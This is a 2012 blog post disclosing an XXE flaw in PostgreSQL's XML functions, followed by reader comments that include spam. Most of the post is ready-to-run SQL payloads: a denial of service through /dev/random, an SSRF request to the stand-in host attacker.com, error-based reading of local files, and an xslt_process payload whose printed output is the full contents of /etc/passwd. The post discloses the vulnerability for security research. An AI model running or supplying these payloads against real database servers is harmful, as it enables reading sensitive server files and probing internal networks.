пятница, 1 июня 2012 г.

PostgreSQL (all) error-based XXE 0day

Recently we found and published at PHDays PostgreSQL 0day error-based XXE vulnerability.
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).

Example:
DoS:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')

SSRF:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')

Error-based XXE:

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');

ERROR:  invalid XML document
DETAILS:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab       ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab        ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab          ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                               ^
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;                                                                               ^
UPDATE!
Classical XXE from XSLT transformation found.
Reading any data are possible also:


SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*">  <xsl:element name="samples">    <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element>  </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
                                     xslt_process                                    
-----------------------------------------------------------------------------------------
 <?xml version="1.0"?>
 <samples><sample>root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
 sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
 puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
 Debian-exim:x:111:115::/var/spool/exim4:/bin/false
 alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
 oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
 mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
 postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
 oracle:x:1002:1002::/u01/app/oracle:/bin/bash
 </sample></samples>

(1 row)

4 комментария:

  1. I'd like to notice that xslt_process is from xml2 postgres module, which is being deprecated [1]. E.g. in psql 9.1.3 it is turned off by default.

    PS. That's why I wasn't able to discover this file-reading during phdays =)

    [1] http://www.postgresql.org/docs/9.1/static/xml2.html

    ОтветитьУдалить
  2. Thanks for sharing, nice post! Post really provice useful information!

    Giaonhan247 chuyên dịch vụ mua hộ hàng mỹ với các mặt hàng từ pandora úc hay từ web ebay việt nam cùng với bảng giá gửi hàng đi mỹ uy tín, giá rẻ.

    ОтветитьУдалить